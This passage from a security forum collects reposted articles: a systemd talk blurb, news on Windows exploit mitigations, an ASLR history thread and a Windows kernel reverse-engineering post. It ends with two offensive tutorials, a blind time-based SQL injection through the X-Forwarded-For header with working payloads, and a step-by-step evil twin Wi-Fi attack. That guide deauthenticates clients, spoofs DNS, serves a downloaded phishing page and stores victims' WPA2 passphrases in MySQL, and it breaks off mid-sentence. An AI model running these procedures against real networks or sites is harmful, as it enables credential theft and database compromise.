crash_c0000005_chrome_child.dll+0x2c915c0_WRITE_null.dmp Meso file format Coming soon (once it's stable) Sursa: https://github.com/gamozolabs/mesos
      • 1
      • Like
  8. Benno Rice https://2019.linux.conf.au/schedule/p... systemd is, to put it mildly, controversial. As a FreeBSD developer I decided I wanted to know why. I delved into the history of bootstrap systems, and even the history of UNIX and other contemporary operating systems, to try and work out why something like systemd was seem as necessary, if not desirable. I also tried to work out why so many people found it so upsetting, annoying, or otherwise rage-inducing. Join me on a journey through the bootstrap process, the history of init, the reasons why change can be scary, and the discovery of a part of your OS you may not even know existed. linux.conf.au is a conference about the Linux operating system, and all aspects of the thriving ecosystem of Free and Open Source Software that has grown up around it. Run since 1999, in a different Australian or New Zealand city each year, by a team of local volunteers, LCA invites more than 500 people to learn from the people who shape the future of Open Source. For more information on the conference see https://linux.conf.au/
  9. Microsoft: Improved security features are delaying hackers from attacking Windows users If a vulnerability is exploited, it is most likely going to be exploited as zero-day, or an old security bug for which users and companies have had enough time to patch. By Catalin Cimpanu for Zero Day | February 10, 2019 -- 18:37 GMT (18:37 GMT) | Topic: Security Image: Matt Miller Constant security improvements to Microsoft products are finally starting to pay off dividends, a Microsoft security engineer revealed last week. Speaking at the BlueHat security conference in Israel, Microsoft security engineer Matt Miller said that widespread mass exploitation of security flaws against Microsoft users is now uncommon --the exception to the rule, rather than the norm. Miller credited the company's efforts in improving its products with the addition of security-centric features such as a firewall on-by-default, Protected View in Office products, DEP (Data Execution Prevention), ASLR (Address Space Layout Randomization), CFG (Control Flow Guard), app sandboxing, and more. These new features have made it much harder for mundane cybercrime operations to come up with zero-days or reliable exploits for newly patched Microsoft bugs, reducing the number of vulnerabilities exploited at scale. Mass, non-discriminatory exploitation does eventually occur, but usually long after Microsoft has delivered a fix, and after companies had enough time to test and deploy patches. Miller said that when vulnerabilities are exploited, they are usually part of targeted attacks, rather than cybercrime-related mass exploitation attacks. For example, in 2018, 90 percent of all zero-days affecting Microsoft products were exploited part of targeted attacks. These are zero-days found and used by nation-state cyber-espionage groups against strategic targets, rather than vulnerabilities discovered by spam groups or exploit kit operators. The other 10 percent of zero-day exploitation attempts weren't cyber-criminals trying to make money, but people playing with non-weaponized proof-of-concept code trying to understand what a yet-to-be-patched vulnerability does. Image: Matt Miller "It is now uncommon to see a non-zero-day exploit released within 30 days of a patch being available," Miller also added. Exploits for both zero-day and non-zero-day vulnerabilities usually pop up much later because it's getting trickier and trickier to develop weaponized exploits for vulnerabilities because of all the additional security features that Microsoft has added to Windows and other products. Two charts in Miller's presentation perfectly illustrate this new state of affairs. The chart on the left shows how Microsoft's efforts into patching security flaws have intensified in recent years, with more and more security bugs receiving fixes (and a CVE identifier). On the other hand, the chart on the right shows that despite the rising number of known flaws in Microsoft products, fewer and fewer of these vulnerabilities are entering the arsenal of hacking groups and real-world exploitation within the 30 days after a patch. Image: Matt Miller This shows that Microsoft's security defenses are doing their job by putting additional hurdles in the path of cybercrime groups. If a vulnerability is exploited, it is most likely going to be exploited as zero-day by some nation-state threat actor, or as an old security bug for which users and companies have had enough time to patch. Sursa: https://www.zdnet.com/article/microsoft-improved-security-features-are-delaying-hackers-from-attacking-windows-users/
  10. John Lambert @JohnLaTwC 2 days ago, 23 tweets, 5 min read Read on Twitter Story time. This one is about a feature in Windows called ASLR. It was 2005. We were working on Windows Vista. Most remember it as the release with the maligned User Account Control feature. For us in Trustworthy Computing it was the first full Windows cycle where we could apply all the security engineering tools we had from start to finish. Efforts such as fuzzing file parsers, scrubbing the code of ‘banned APIs’ across millions of lines of code, fixing masses of potential bugs from static analysis, and driving initiatives to deal with newly discovered ‘diseases’ like mismatched container COM instantiation. We hired the most spectacular group of researchers I’ve seen assembled from NGS, iSEC Partners, IOActive, and n.runs, gave them source code, access to Windows engineers, and told to hack without boundaries. My words to them in an early meeting were “you are here to blow sh*t up” A quieter effort was going on to shore up our memory safety mitigations. Mitigations touch the holiest of holies in the OS: the compiler, the memory manager, the loader. Areas you just don’t mess with late in an OS release. The breathing room created by hardware Data Execute Protection we added in XP SP2 was gone. Exploits were using return to libc attacks and taking advantage of the fact that much of the memory layout in a Windows process was predictable. This was a feature. A lot of work went in to carefully laying out memory so commonly loaded DLLs would never ‘collide’ and require the OS to relocate them at load time. The performance saving across every boot, every process load, on every PC was massive. And we needed to undo that work to build a new defense—Address Space Layout Randomization or ASLR. ASLR would scramble the location of loaded modules and other process structures. However, it was late in the release, crazy late, to contemplate a change of this magnitude. We had a few things in our favor. The feature was championed by @MattT_Cyber. Sometimes things happen because the right person says they need to happen. This was one of those features and Matt was one of those people. Our Exec VP, Jim Allchin, wanted it. Ever since Blaster, he pushed the team to contemplate big security “sledgehammers” instead of just fighting bugs in “hand to hand combat”. Host firewall on by default in XPSP2, hardware DEP support, and now ASLR. Brian Valentine, who oversaw Windows development, recalled a @bluehat talk by @hdmoore where he showed these tables that Metasploit had for identifying code gadgets in consistent locations across OS and service packs. “Will this break that?” It would and that was enough for him. Sponsorship was there but could we pull it off? A crucial moment arrived when the developer responsible for the memory manager, Landy Wang, finished up his backlog of work and got a free moment to consider it. It was a complex change and would it have the desired payoff? He turned to a trusted engineer, Neill Clift, and privately asked if it was worth doing. Neill gave it a nod. I remember Landy doing an initial prototype over a weekend. Suddenly we were in the game. A boatload of work remained to make it truly viable with contributions across the company: - Architecture and Development: LandyW, ArunKi, RichardS, BryanT - Security Analysis: NeillC, NiGoel, MichalCh, SergFo - AppCompat Analysis: RobKenny, RPaige, TBaxter Needless to say, it happened. We pondered how to announce it. Since ASLR was a feature that security researchers would notice, we decided to introduce it at a researcher conference. The year before I attended Ph Neutral put on by the legendary Phenoelit group in Germany. mentions took me around and introduced me to people at the con. Sometimes people are right where they need to be. Microsoft needed @window and she brought down walls between Microsoft and the researcher community. This conference was the right spot. I flew to Berlin. In 2006 Microsoft was very controversial in security circles. Showing up as the representative of the “evil empire” in a den of security researchers dedicated to finding our flaws and revealing them to a seeming clueless corporate behemoth was enough to give anyone pause I entered the room to give my presentation. The room filled up. Completely up. People were sitting on the floor, standing along the walls, hovering in the doorway. There was an electricity in the air--the room was finally going to hear from a Microsoft insider on our efforts. Would people be hostile? Interrupt and challenge me? There were plenty of reasons for the crowd to be cynical. I had no idea how this was going to go. I had prepared a very technical presentation because I that’s how I thought to best respect the audience. FX (@41414141) came up to the front and introduced me. Then he did something I’ll never forget. Seeming on the spur of the moment, he didn’t join the audience and instead sat next to me by the podium. It was a small thing in some ways, but it meant the world to me. His presence next to me seemed to suggest to the room “he is a guest here and we will treat him with respect”. To feel like an outsider and have the ultimate insider in his forum make sure you will be treated right is one of the kindest gestures I’ve ever received. I completed my presentation and found the subsequent hallway conversations thrilling. I later delivered the same brief at Blackhat (blackhat.com/presentations/…). As time went on, the value of ASLR diminished but I remember most the human moments that brought together an unlikely cast working on the messy hairball of security, enduring headwinds and advancing forward. Sursa: https://threadreaderapp.com/thread/1093956949073289216.html
  11. Yes, More Callbacks — The Kernel Extension Mechanism Yarden Shafir Jan 1 Recently I had to write a kernel-mode driver. This has made a lot of people very angry and been widely regarded as a bad move. (Douglas Adams, paraphrased) Like any other piece of code written by me, this driver had several major bugs which caused some interesting side effects. Specifically, it prevented some other drivers from loading properly and caused the system to crash. As it turns out, many drivers assume their initialization routine (DriverEntry) is always successful, and don’t take it well when this assumption breaks. j00ru documented some of these cases a few years ago in his blog, and many of them are still relevant in current Windows versions. However, these buggy drivers are not really the issue here, and j00ru covered it better than I could anyway. Instead I focused on just one of these drivers, which caught my attention and dragged me into researching the so-called “windows kernel host extensions” mechanism. The lucky driver is Bam.sys (Background Activity Moderator) — a new driver which was introduced in Windows 10 version 1709 (RS3). When its DriverEntry fails mid-way, the call stack leading to the system crash looks like this: From this crash dump, we can see that Bam.sys registered a process creation callback and forgot to unregister it before unloading. Then, when a process was created / terminated, the system tried to call this callback, encountered a stale pointer and crashed. The interesting thing here is not the crash itself, but rather how Bam.sys registers this callback. Normally, process creation callbacks are registered via nt!PsSetCreateProcessNotifyRoutine(Ex), which adds the callback to the nt!PspCreateProcessNotifyRoutine array. Then, whenever a process is being created or terminated, nt!PspCallProcessNotifyRoutines iterates over this array and calls all of the registered callbacks. However, if we run for example “!wdbgark.wa_systemcb /type process“ in WinDbg, we’ll see that the callback used by Bam.sys is not found in this array. Instead, Bam.sys uses a whole other mechanism to register its callbacks. If we take a look at nt!PspCallProcessNotifyRoutines, we can see an explicit reference to some variable named nt!PspBamExtensionHost (there is a similar one referring to the Dam.sys driver). It retrieves a so-called “extension table” using this “extension host” and calls the first function in the extension table, which is bam!BampCreateProcessCallback. If we open Bam.sys in IDA, we can easily find bam!BampCreateProcessCallback and search for its xrefs. Conveniently, it only has one, in bam!BampRegisterKernelExtension: As suspected, Bam!BampCreateProcessCallback is not registered via the normal callback registration mechanism. It is actually being stored in a function table named Bam!BampKernelCalloutTable, which is later being passed, together with some other parameters (we’ll talk about them in a minute) to the undocumented nt!ExRegisterExtension function. I tried to search for any documentation or hints for what this function was responsible for, or what this “extension” is, and couldn’t find much. The only useful resource I found was the leaked ntosifs.h header file, which contains the prototype for nt!ExRegisterExtension as well as the layout of the _EX_EXTENSION_REGISTRATION_1 structure. Prototype for nt!ExRegisterExtension and _EX_EXTENSION_REGISTRATION_1, as supplied in ntosifs.h: NTKERNELAPI NTSTATUS ExRegisterExtension ( _Outptr_ PEX_EXTENSION *Extension, _In_ ULONG RegistrationVersion, _In_ PVOID RegistrationInfo ); typedef struct _EX_EXTENSION_REGISTRATION_1 { USHORT ExtensionId; USHORT ExtensionVersion; USHORT FunctionCount; VOID *FunctionTable; PVOID *HostInterface; PVOID DriverObject; } EX_EXTENSION_REGISTRATION_1, *PEX_EXTENSION_REGISTRATION_1; After a bit of reverse engineering, I figured that the formal input parameter “PVOID RegistrationInfo” is actually of type PEX_EXTENSION_REGISTRATION_1. The pseudo-code of nt!ExRegisterExtension is shown in appendix B, but here are the main points: nt!ExRegisterExtension extracts the ExtensionId and ExtensionVersion members of the RegistrationInfo structure and uses them to locate a matching host in nt!ExpHostList (using the nt!ExpFindHost function, whose pseudo-code appears in appendix B). Then, the function verifies that the amount of functions supplied in RegistrationInfo->FunctionCount matches the expected amount set in the host’s structure. It also makes sure that the host’s FunctionTable field has not already been initialized. Basically, this check means that an extension cannot be registered twice. If everything seems OK, the host’s FunctionTable field is set to point to the FunctionTable supplied in RegistrationInfo. Additionally, RegistrationInfo->HostInterface is set to point to some data found in the host structure. This data is interesting, and we’ll discuss it soon. Eventually, the fully initialized host is returned to the caller via an output parameter. We saw that nt!ExRegisterExtension searches for a host that matches RegistrationInfo. The question now is, where do these hosts come from? During its initialization, NTOS performs several calls to nt!ExRegisterHost. In every call it passes a structure identifying a single driver from a list of predetermined drivers (full list in appendix A). For example, here is the call which initializes a host for Bam.sys: nt!ExRegisterHost allocates a structure of type _HOST_LIST_ENTRY (unofficial name, coined by me), initializes it with data supplied by the caller, and adds it to the end of nt!ExpHostList. The _HOST_LIST_ENTRY structure is undocumented, and looks something like this: struct _HOST_LIST_ENTRY { _LIST_ENTRY List; DWORD RefCount; USHORT ExtensionId; USHORT ExtensionVersion; USHORT FunctionCount; // number of callbacks that the extension // contains POOL_TYPE PoolType; // where this host is allocated PVOID HostInterface; // table of unexported nt functions, // to be used by the driver to which // this extension belongs PVOID FunctionAddress; // optional, rarely used. // This callback is called before // and after an extension for this // host is registered / unregistered PVOID ArgForFunction; // will be sent to the function saved here _EX_RUNDOWN_REF RundownRef; _EX_PUSH_LOCK Lock; PVOID FunctionTable; // a table of the callbacks that the // driver “registers” DWORD Flags; // Only uses one bit. // Not sure about its meaning. } HOST_LIST_ENTRY, *PHOST_LIST_ENTRY; When one of the predetermined drivers loads, it registers an extension using nt!ExRegisterExtension and supplies a RegistrationInfo structure, containing a table of functions (as we saw Bam.sys doing). This table of functions will be placed in the FunctionTable member of the matching host. These functions will be called by NTOS in certain occasions, which makes them some kind of callbacks. Earlier we saw that part of nt!ExRegisterExtension functionality is to set RegistrationInfo->HostInterface (which contains a global variable in the calling driver) to point to some data found in the host structure. Let’s get back to that. Every driver which registers an extension has a host initialized for it by NTOS. This host contains, among other things, a HostInterface, pointing to a predetermined table of unexported NTOS functions. Different drivers receive different HostInterfaces, and some don’t receive one at all. For example, this is the HostInterface that Bam.sys receives: So the “kernel extensions” mechanism is actually a bi-directional communication port: The driver supplies a list of “callbacks”, to be called on different occasions, and receives a set of functions for its own internal use. To stick with the example of Bam.sys, let’s take a look at the callbacks that it supplies: BampCreateProcessCallback BampSetThrottleStateCallback BampGetThrottleStateCallback BampSetUserSettings BampGetUserSettingsHandle The host initialized for Bam.sys “knows” in advance that it should receive a table of 5 functions. These functions must be laid-out in the exact order presented here, since they are called according to their index. As we can see in this case, where the function found in nt!PspBamExtensionHost->FunctionTable[4] is called: To conclude, there exists a mechanism to “extend” NTOS by means of registering specific callbacks and retrieving unexported functions to be used by certain predetermined drivers. I don’t know if there is any practical use for this knowledge, but I thought it was interesting enough to share. If you find anything useful / interesting to do with this mechanism, I’d love to know :) Appendix A — Extension hosts initialized by NTOS: Appendix B — functions pseudo-code: Appendix C — structures definitions: struct _HOST_INFORMATION { USHORT ExtensionId; USHORT ExtensionVersion; DWORD FunctionCount; POOL_TYPE PoolType; PVOID HostInterface; PVOID FunctionAddress; PVOID ArgForFunction; PVOID unk; } HOST_INFORMATION, *PHOST_INFORMATION; struct _HOST_LIST_ENTRY { _LIST_ENTRY List; DWORD RefCount; USHORT ExtensionId; USHORT ExtensionVersion; USHORT FunctionCount; // number of callbacks that the // extension contains POOL_TYPE PoolType; // where this host is allocated PVOID HostInterface; // table of unexported nt functions, // to be used by the driver to which // this extension belongs PVOID FunctionAddress; // optional, rarely used. // This callback is called before and // after an extension for this host // is registered / unregistered PVOID ArgForFunction; // will be sent to the function saved here _EX_RUNDOWN_REF RundownRef; _EX_PUSH_LOCK Lock; PVOID FunctionTable; // a table of the callbacks that // the driver “registers” DWORD Flags; // Only uses one flag. // Not sure about its meaning. } HOST_LIST_ENTRY, *PHOST_LIST_ENTRY;; struct _EX_EXTENSION_REGISTRATION_1 { USHORT ExtensionId; USHORT ExtensionVersion; USHORT FunctionCount; PVOID FunctionTable; PVOID *HostTable; PVOID DriverObject; }EX_EXTENSION_REGISTRATION_1, *PEX_EXTENSION_REGISTRATION_1; Yarden_Shafir Security researcher Sursa: https://medium.com/yarden-shafir/yes-more-callbacks-the-kernel-extension-mechanism-c7300119a37a
  12. X Forwarded for SQL injection 06.Feb.2019 Nikos Danopoulos, Ghost Labs Ghost Labs Ghost Labs performs hundreds of success tests for its customers ranging from global enterprises to SMEs. Our team consists of highly skilled ethical hackers, covering a wide range of advanced testing services to help companies keep up with evolving threats and new technologies. Last year, on May, I was assigned a Web Application test of a regular customer. As the test was blackbox one of the few entry points - if not the only - was a login page. The tight scoping range and the staticity of the Application did not provide many options. After spending some time on the enumeration phase by trying to find hidden files/directories, leaked credentials online, common credentials, looking for vulnerable application components and more I was driven to a dead end. No useful information were received, the enumeration phase had finished and no process had been made. Moreover, every fuzzing attempt on the login parameters didn’t not trigger any interesting responses. Identifying the entry point A very useful Burp Suite Extension is Bypass WAF. To find out how this extension works, have a quick look here. Briefly, this extension is used to bypass a Web Application firewall by inserting specific headers on our HTTP Requests. X-Forwarded-For is one of the them. What this header is also known for though is for the frequent use by the developers to store the IP Data of the client. The following backend SQL statement is a vulnerable example of this: mysql_query("SELECT username, password FROM users-data WHERE username='".sanitize($_POST['username'])."' AND password='".md5($_POST['password'])."' AND ip_adr='".ipadr()."'"); More info here: SQL Injection through HTTP Headers Where ipadr() is a function that reads the $_SERVER['HTTP_X_FORWARDED_FOR'] value (X-Forwarded-For header) and by applying some regular expression decides whether to store the value or not. For the web application I was testing, it turned out to have a similar vulnerability. The provided X-Forwarded-For header was not properly validated, it was parsed as a SQL statement and there was the entry point. Moreover, it was not mandatory to send a POST request to the login page and inject the payload through the header. The header was read and evaluated on the index page, by just requesting the “/” directory. Due to the application’s structure, I was not able to trigger any visible responses from the payloads. That made the Injection a Blind, Time Based one. Out of several and more complex payloads - mainly for debugging purposes - the final, initial, payload was: "XOR(if(now()=sysdate(),sleep(6),0))OR” And it was triggered by a similar request: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21 X-Forwarded-For: "XOR(if(now()=sysdate(),sleep(6),0))OR” X-Requested-With: XMLHttpRequest Referer: http://internal.customer.info/ Host: internal.customer.info Connection: close Accept-Encoding: gzip,deflate Accept: / The response was delayed, the sleep value was incremented to validate the finding and indeed, the injection point was ready. As sqlmap couldn’t properly insert the injection point inside the XOR payload, an initial manual enumeration was done. The next information extracted was the Database Length. That would allow me to later identify the Database Name too. Here is the payload used: "XOR(if(length(database())<='30',sleep(5),null))OR" Of course, Burp Intruder was used to gradually increment the database length value. It turned out that the Database Length is 30. To find the Database Name Burp Intruder was used again with the following payload: "XOR(if(MID(database(),1,1)='§position§',sleep(9),0))OR" To automate this in an attack the following payload was used: "XOR(if(MID(database(),1,§number§)='§character§',sleep(2),0))OR" During the attack I noticed that the first 3 characters are the same with the first character of the domain name I am testing. The domain were 20 character long. I paused the intruder attack, went back to repeater and verified like this: "XOR(if(MID(database(),1,20)='<domain-name>',sleep(4),0))OR" Indeed, the server delayed to respond indicating that the 15 first characters of the Database Name are the same as the domain name. The database name was 30 characters long. I had to continue the attack but this time with a different payload, starting the attack from character 21, in order to find the full database name. After a few minutes, the full database name was extracted. Format: “<domain-name>_<subdomain-name>_493 ” With the database name I then attempted to enumerate table names. Similarly, a char-by-char bruteforce attacks is required to find the valid names. To do this I loaded the information_schema.tables table that provides information about all the databases’ tables. I filtered only the current’s database related tables by using the WHERE clause: "XOR(if(Ascii(substring(( Select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))= '100', sleep(5),0))OR"*/ As the previous payload was the initial one, I simplified it to this: "XOR(if((substring(( Select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))='a', sleep(3),0)) OR "*/ Again, the payload was parsed to Burp Intruder to automate the process. After a few minutes the first tables were discovered: After enumerating about 20 Tables Names I decided to try again my luck with SQLmap. As several tables where discovered, one of them was used to help sqlmap understand the injection point and continue the attack. Payload used in sqlmap: XOR(select 1 from cache where 1=1 and 1=1*)OR By that time I managed to properly set the injection point and I forced sqlmap to just extract the column names and data from the interesting tables. Notes and Conclusion At the end of the injection the whole database along with the valuable column information was received. The customer was notified immediately and the attack was reproduced as a proof of concept. Sometimes manual exploitation - especially blind, time based attacks - may seem tedious. As shown, it is also sometimes difficult to automate a detected injection attack. The best thing that can be done on such cases is to manually attack until all the missing information for the automation of the attack are collected. Sursa: https://outpost24.com/blog/X-forwarded-for-SQL-injection
      • 2
      • Thanks
  13. Evil Twin Attack: The Definitive Guide by Hardeep Singh Last updated Feb. 10, 2019 In this article I’ll show you how an attacker can retrieve cleartext WPA2 passphrase on automation using an Evil Twin Access Point. No need of cracking or any extra hardware other than a Wireless adapter. I am using a sample web page for the demonstration. An attacker can turn this webpage into basically any webapp to steal information. Information like domain credentials, social login passwords, credit card information etc. ET Evil Twin noun Definition A fraudulent wireless access point masquerading as a legitimate AP. Evil Twin Access Point’s sole purpose is to eavesdrop on WiFi users to steal personal or corporate information without user’s knowledge. We will not be using any automated script, rather we will understand the concept and perform it manually so that you can make your own script to automate the task and make it simple and usable on low-end devices. Lets begin now! Download All 10 Chapters of WiFi Pentesting and Security Book… PDF version contains all of the content and resources found in the web-based guide Evil Twin Attack Methodology Step 1: Attacker scans the air for the target access point information. Information like SSID name, Channel number, MAC Address. He then uses that information to create an access point with same characteristics, hence Evil Twin Attack. Step 2: Clients on the legitimate AP are repeatedly disconnected, forcing users to connect to the fraudulent access point. Step 3: As soon as the client is connected to the fake access point, S/he may start browsing Internet. Step 4: Client opens up a browser window and see a web administrator warning saying “Enter WPA password to download and upgrade the router firmware” Step 5: The moment client enters the password, s/he will be redirected to a loading page and the password is stored in the MySQL database of the attacker machine. The persistent storage and active deauthentication makes this attack automated. An attacker can also abuse this automation by simply changing the webpage. Imagine the same WPA2 password warning is replaced by “Enter domain credentials to access network resources”. The fake AP will be up all time and storing legitimate credentials in persistent storage. I’ll discuss about it in my Captive Portal Guide. Where I’ll demonstrate how an attacker can even hack domain credentials without having a user to open a webpage. Just connecting the WiFi can take a WiFi user to our webpage, automatically. A WiFi user could be using Android, iOS, a MacOS or a windows laptop. Almost every device is susceptible to it. but for now I’ll show you how the attack works with lesser complications. Tweet this Evil Twin Attack Guide Prerequisites Below are the following list of hardware and software used in creating this article. Use any hardware of your choice until it supports the softwares you’d be using. Hardware used: A Laptop (4GB RAM, Intel i5 processor) Alfa AWUS036NH 1W wireless adapter Huawei 3G WiFi dongle for Internet connection to the Kali Virtual Machine Software Used VMWare Workstation/Fusion 2019 Kali Linux 2019 (Attacker) Airmon-ng, airodump-ng, airbase-ng, and aireplay-ng DNSmasq Iptables Apache, mysql Firefox web browser on Ubuntu 16.10 (Victim) Installing required tools So far we have aircrack-ng suite of tools, apache, mysql, iptables pre-installed in our Kali Linux virtual machine. We just need to install dnsmasq for IP address allocation to the client. Install dnsmasq in Kali Linux Type in terminal: apt-get update apt-get install dnsmasq -y This will update the cache and install latest version of dhcp server in your Kali Linux box. Now all the required tools are installed. We need to configure apache and the dhcp server so that the access point will allocate IP address to the client/victim and client would be able to access our webpage remotely. Now we will define the IP range and the subnet mask for the dhcp server. Configure dnsmasq Create a configuration file for dnsmasq using vim or your favourite text editor and add the following code. sudo vi ~/Desktop/dnsmasq.conf ~/Desktop/dnsmasq.conf interface=at0 dhcp-range=10.0.0.10,10.0.0.250,12h dhcp-option=3,10.0.0.1 dhcp-option=6,10.0.0.1 server=8.8.8.8 log-queries log-dhcp listen-address=127.0.0.1 Save and exit. Use your desired name for .conf file. Pro Tip: Replace at0 with wlan0 everywhere when hostapd is used for creating an access point Parameter Breakdown dhcp-range=10.0.0.10,10.0.0.250,12h: Client IP address will range from 10.0.0.10 to 10.0.0.250 and default lease time is 12 hours. dhcp-option=3,10.0.0.1: 3 is code for Default Gateway followed by IP of D.G i.e. 10.0.0.1 dhcp-option=6,10.0.0.1: 6 for DNS Server followed by IP address (Optional) Resolve airmon-ng and Network Manager Conflict Before enabling monitor mode on the wireless card let’s fix the airmon-ng and network-manager conflict forever. So that we don’t need to kill the network-manager or disconnect tany network connection before putting wireless adapter into monitor mode as we used to run airmon-ng check kill every time we need to start wifi pentest. Open network manager’s configuration file and put the MAC address of the device you want network-manager to stop managing: vim /etc/NetworkManager/NetworkManager.conf Now add the following at the end of the file [keyfile] unmanaged-devices:mac=AA:BB:CC:DD:EE:FF, A2:B2:C2:D2:E2:F2 Now that you have edited the NetworkManager.conf file you should have no conflicts with airmon-ng in Kali Linux We are ready to begin now. Put wireless adapter into monitor mode Bring up the wireless interface ifconfig wlan0 up airmon-ng start wlan0 Putting the card in monitor mode will show a similar output Now our card is in monitor mode without any issues with network manager. You can simply start monitoring the air with command airodump-ng wlan0mon As soon your target AP appears in the airodump-ng output window press CTRL+C and note these three things in a text editor: vi info.txt Set tx-power of alfa card to max: 1000mW tx-power stands for transmission power. By default it is set to 20dBm(Decibel metre) or 100mW. tx-power in mW increases 10 times with every 10 dBm. See the dBm to mW table. If your country is set to US while installation. then your card should operate on 30 dBm(1000 mW) ifconfig wlan0mon down iw reg set US ifconfig wlan0mon up iwconfig wlan0mon If you are thinking why we need to change region to operate our card at 1000mW. Here is why because different countries have different legal allowance of Wireless devices at certain power and frequency. That is why Linux distribution have this information built in and you need to change your region to allow yourself to operate at that frequency and power. Motive of powering up the card is that when creating the hotspot you do not have any need to be near to the victim. victim device will automatically connect to the device with higher signal strength even if it isn’t physically near. Start Evil Twin Attack Begin the Evil Twin attack using airbase-ng: airbase-ng -e "rootsh3ll" -c 1 wlan0mon by default airbase-ng creates a tap interface(at0) as the wired interface for bridging/routing the network traffic via the rogue access point. you can see it using ifconfig at0 command. For the at0 to allocate IP address we need to assign an IP range to itself first. Allocate IP and Subnet Mask ifconfig at0 10.0.0.1 up Note: The Class A IP address, 10.0.0.1, matches the dhcp-option parameter of dnsmasq.conf file. Which means at0 will act as the default gateway under dnsmasq Now we will use our default Internet facing interface, eth0, to route all the traffic from the client through it. In other words, allowing victim to access the internet and allowing ourselves(attacker) to sniff that traffic. For that we will use iptables utility to set a firewall rule to route all the traffic through at0 exclusively. You will get a similar output, if using VM Enable NAT by setting Firewall rules in iptables Enter the following commands to set-up an actual NAT: iptables --flush iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE iptables --append FORWARD --in-interface at0 -j ACCEPT iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 10.0.0.1:80 iptables -t nat -A POSTROUTING -j MASQUERADE Make sure you enter correct interface for –out-interface. eth0 here is the upstream interface where we want to send out packets, coming from at0 interface(rogue AP). Rest is fine. After entering the above command if you are willing to provide Internet access to the victim just enable routing using the command below Enable IP forwarding echo 1 > /proc/sys/net/ipv4/ip_forward Entering “1” in the ip_forward file will tell the system to enable the rules defined in the IPtables and start forwarding traffic(if any). 0 stand for disable. Although rules will remain defined until next reboot. We will put it 0 for this attack, as we are not providing internet access before we get the WPA password. Our Evil Twin attack is now ready and rules has been enabled, now we will start the dhcp server to allow fake AP to allocate IP address to the clients. First we need to tell dhcp server the location of the file we created earlier, which defines IP class, subnet mask and range of the network. Start dhcpd Listener Type in terminal: dnsmasq -C ~/Desktop/dnsmasq.conf -d Here -C stands for Configuration file and -d stands for daemon mode as soon as victim connects you should see similar output for dnsmasq Terminal window [ dnsmasq ] dnsmasq: started, version 2.76 cachesize 150 dnsmasq: compile time options: IPv6 GNU-getopt DBus i18n IDN DHCP DHCPv6 no-Lua TFTP conntrack ipset auth DNSSEC loop-detect inotify dnsmasq-dhcp: DHCP, IP range 10.0.0.10 -- 10.0.0.250, lease time 12h dnsmasq: using nameserver 8.8.8.8#53 dnsmasq: reading /etc/resolv.conf dnsmasq: using nameserver 8.8.8.8#53 dnsmasq: using nameserver 192.168.74.2#53 dnsmasq: read /etc/hosts - 5 addresses dnsmasq-dhcp: 1673205542 available DHCP range: 10.0.0.10 -- 10.0.0.250 dnsmasq-dhcp: 1673205542 client provides name: rootsh3ll-iPhone dnsmasq-dhcp: 1673205542 DHCPDISCOVER(at0) 2c:33:61:3d:c4:2e dnsmasq-dhcp: 1673205542 tags: at0 dnsmasq-dhcp: 1673205542 DHCPOFFER(at0) 10.0.0.247 2c:33:61:3a:c4:2f dnsmasq-dhcp: 1673205542 requested options: 1:netmask, 121:classless-static-route, 3:router, <-----------------------------------------SNIP-----------------------------------------> dnsmasq-dhcp: 1673205542 available DHCP range: 10.0.0.10 -- 10.0.0.250 In case you are facing any issue regarding dhcp server, just kill the curently running dhcp processes killall dnsmasq dhcpd isc-dhcp-server and run dnsmasq again. It should work now. Start the Services Now start the dhcp server, apache and mysql inline /etc/init.d/apache2 start /etc/init.d/mysql start We have our Evil Twin attack vector up and working perfectly. Now we need to setup our fake webpage in action so that victim will see the webpage while browsing and enter the passphrase which s/he uses for his/her access point. Download Rogue AP Configuration Files wget https://cdn.rootsh3ll.com/u/20180724181033/Rogue_AP.zip and simply enter the following command in Terminal unzip rogue_AP.zip -d /var/www/html/ This command will extract the contents of rogue_AP.zip file and copy them to the apache’s html directory so that when the victim opens the browser s/he will automatically be redirected to the default index.html webpage. Now to store the credentials entered by the victim in the html page, we need an SQL database. you will see a dbconnect.php file for that, but to be in effect you need a database created already so that the dbconnect.php will reflect the changes in the DB. Open terminal and type: mysql -u root -p Create a new user fakeap and password fakeap As you cannot execute MySQL queries from PHP being a root user since version 5.7 create user fakeap@localhost identified by 'fakeap'; now create database and table as defined in the dbconnect.php create database rogue_AP; use rogue_AP; create table wpa_keys(password1 varchar(32), password2 varchar(32)); It should go like this: Grant fakeap all the permissions on rogue_AP Database: grant all privileges on rogue_AP.* to 'fakeap'@'localhost'; Exit and log in using new user mysql -u fakeap -p Select rogue_AP database use rogue_AP; Insert a test value in the table insert into wpa_keys(password1, password2) values ("testpass", "testpass"); select * from wpa_keys; Note that both the values are same here, that means password and confirmation password should be the same. Our attack is now ready just wait for the client to connect and see the credential coming. In some cases your client might already be connected to the original AP. You need to disconnect the client as we did in the previous chapters using aireplay-ng utility. Syntax: aireplay-ng --deauth 0 -a <BSSID> <Interface> aireplay-ng --deauth 0 -a FC:DD:55:08:4F:C2 wlan0mon --deauth 0: Unlimited de-authentication requests. Limit the request by entering natural numbers. We are using 0 so that every client will disconnect from that specific BSSID and connect to our AP as it is of the same name as of real AP and also open type access point. As soon a client connects to your AP you will see an activity in the airbase-ng terminal window like this Now to simulate the client side I am using Ubuntu machine connected via WiFi and using a Firefox web browser to illustrate the attack. Victim can now access the Internet. You can do 2 things at this staged: Sniff the client traffic Redirect all the traffic to the fake AP page and that’s what we wanna do. Redirect the client to our fake AP page. Just run this command: dnsspoof -i at0 It will redirect all HTTP traffic coming from the at0 interface. Not HTTPS traffic, due to the built in list of HSTS web sites. You can’t redirect HTPS traffic without getting an SSL/TLS error on the victim’s machine. When victim tries to access any website(google.com in this case), s/he will see this page which tell the victim to enter the password to download and upgrade the firmware Here i am entering “iamrootsh3ll” as the password that I (Victim) think is his/her AP’s password. As soon as the victim presses [ENTER] s/he will see this Now coming back to attacker side. You need to check in the mySQL database for the stored passwords. Just type the previously used command in the mySQL terminal window and see whether a new update is there or not. After simulating I checked the mySQL DB and here is the output Voila! you have successfully harvested the WPA2 passphrase, right from the victim, in plain text. Now close all the terminal windows and connect back to the real AP to check whether the password is correct or 